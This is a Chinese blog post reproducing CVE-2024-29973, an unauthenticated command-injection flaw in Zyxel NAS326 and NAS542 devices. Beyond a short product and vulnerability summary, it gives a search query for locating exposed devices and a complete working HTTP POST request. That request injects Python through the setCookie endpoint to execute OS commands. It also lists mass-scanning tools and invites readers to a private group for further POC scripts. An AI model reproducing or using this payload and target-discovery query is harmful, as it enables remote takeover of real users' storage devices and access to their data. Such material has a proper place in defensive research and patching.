【漏洞复现】Zyxel NAS设备 setCookie 未授权命令注入漏洞(CVE-2024-29973)

于 2024-06-19 21:00:06 发布
阅读量886 收藏 5
点赞数 20
分类专栏: 漏洞复现篇 文章标签: RCE Zyxel NAS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139812820
版权

0x01 产品简介

Zyxel-NAS 是指由 Zyxel Communications Corporation(合勤科技股份有限公司)开发和生产的网络附加存储(Network Attached Storage,简称 NAS)设备。NAS 是一种专门用于存储和共享文件的设备,它通过网络连接到计算机、服务器或其他设备,提供集中式的文件存储和访问功能。

0x02 漏洞概述

Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。

0x03 搜索语法

body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"

在这里插入图片描述

0x04 漏洞复现

POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
 
------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="c0"
 
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
------WebKitFormBoundaryHHaZAYecVOf5sfa6--

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 20
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Zyxel NAS设备 setCookie 授权命令注入漏洞复现(CVE-2024-29973)
0xSec
06-19 897
Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令
ZyXEL-NAS326:合勤科技NAS326现代化2019
05-26
ZyXEL NAS326黑客与现代化 免责声明:对于本指南的任何使用或互动,我概不负责。 提供本指南的目的是为了教育目的,并且还提供有用的最终结果,这就是ZyXELNAS326变得比ZyXEL当前支持的功能更强大。 这一切是如何...
Zyxel NSA310远程命令执行漏洞(exp)
weixin_34268579的博客
07-25 191
概要 Zyxel NAS310是一款具备资料存储功能的装置,因此也称为“网络存储器”。它是一种专用数据存储服务器。它以数据为中心,将存储设备与服务器彻底分离,集中 管理数据,从而释放带宽、提高性能、降低总拥有成本、保护投资。其成本远远低于使用服务器存储,而效率却远远高于后者。 国外安全研究员披露Zyxel NAS310存在一个远程命令执行漏洞(https://blogs.securiteam....
合勤紧急修复NAS设备中的RCE漏洞
smellycat000的专栏
06-05 186
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士合勤 (Zyxel) 网络公司紧急发布安全更新,修复了影响已达生命周期的老旧NAS 设备中的三个严重漏洞。这三个漏洞影响运行固件版本5.21 (AAZF.16) Co及更早版本的NAS326以及影响5.21 (ABAG.13) Co及更早版本的NAS542设备。这三个严重漏洞可使攻击者执行命令注入和远程代码执行攻击。不过其中两个可导致提权和信息泄...
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 645
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
Xsafe#PeiQi-WIKI-POC#Zyxel NBG2105 身份验证绕过 CVE-2021-32972
07-25
Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞描述Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现
合勤 zyxel gs2200-24 交换机资料 固件
06-20
合勤ZyXEL GS2200-24交换机是一款企业级的网络设备,专为中小企业或大型网络的边缘接入设计。该系列交换机以其高性能、高可靠性以及丰富的管理功能著称。在这个压缩包中,我们找到了与这款交换机相关的各种资料,...
ZyXEL NAS Link Capture-crx插件
04-02
创建右键单击上下文菜单以将链接发送到您的Zyxel Home NAS设备。 作者的注意:如果您获得某种错误“找不到NSA210”,大多数可能是您的计算机或当地网络中的东西是行为不端的。进入扩展的选项并将名称更改为设备的IP...
CTLK_C3000_kernel-config_C3000Z_CZD005_zyxel_
10-02
CTLK_C3000_kernel-config_C3000Z_CZD005_zyxel_ 这个标题揭示了我们正在处理一个与Zyxel C3000Z无线路由器相关的内核配置文件。"Kernel config"指的是操作系统的内核配置,它是操作系统的核心部分,负责管理硬件...
udp分片报文pcap文件
07-18
udp分片报文pcap文件:64kudp大包分成每片658字节总计100片
计算机教学导案.doc
07-18
计算机
摩根:2024年大市前瞻.pdf
07-18
摩根:2024年大市前瞻
计算机控制专业技术专题实习任务书温度控制.doc
07-18
计算机
计算机控制系统.doc
07-18
计算机
计算机模拟考试.doc
07-18
计算机
WHO联合国健康老龄化十年进展报告2021-2023年英文版88页.pdf
07-18
医疗行业研究报告
2023年度全球新药研发进展报告-药智数据.pdf
07-18
2023年度全球新药研发进展报告-药智数据
2023-04-06-项目笔记 - 第一百九十八阶段 - 4.4.2.196全局变量的作用域-196 -2024.07.18
最新发布
07-18
2023-04-06-项目笔记-第一百九十八阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.196局变量的作用域_196- 2024-07-18
计算机内审方案.doc
07-18
计算机
usgv6000设备包下载
09-08
USGv6000设备包下载是指下载用于USGv6000设备的软件包。USGv6000是一款高性能的统一安全网关设备,用于网络安全管理和保护。为了保持设备的最新功能和性能,用户需要定期下载并安装设备包。 首先,用户可以登录到ZyXEL的官方网站或其他授权渠道,找到USGv6000设备包的下载页面。在这个页面上,用户可以找到不同版本和类型的设备包,如固件升级包、特定功能的附加包等。用户可以根据自己的需求和设备的要求选择合适的设备包下载。 然后,用户需要选择下载设备包的方式。一般来说,设备包可以选择通过FTP、HTTP或TFTP等协议进行下载。用户可以根据自己的网络环境和设备的支持情况选择合适的下载方式。 在下载设备包之前,用户需要确保设备的连接稳定,并且有足够的存储空间来存储设备包。同时,用户需要了解下载设备包的流量消耗和时间,以便合理安排网络使用和设备升级。 最后,用户可以点击下载按钮或使用命令行等方式开始下载设备包。下载完成后,用户可以在设备上进行固件升级或安装附加功能,以获得更好的性能和功能。 总的来说,USGv6000设备包下载是用户为了保持设备的最新性能和功能而进行的操作。通过正确选择下载方式和合理安排网络使用,用户可以顺利完成设备包的下载和安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值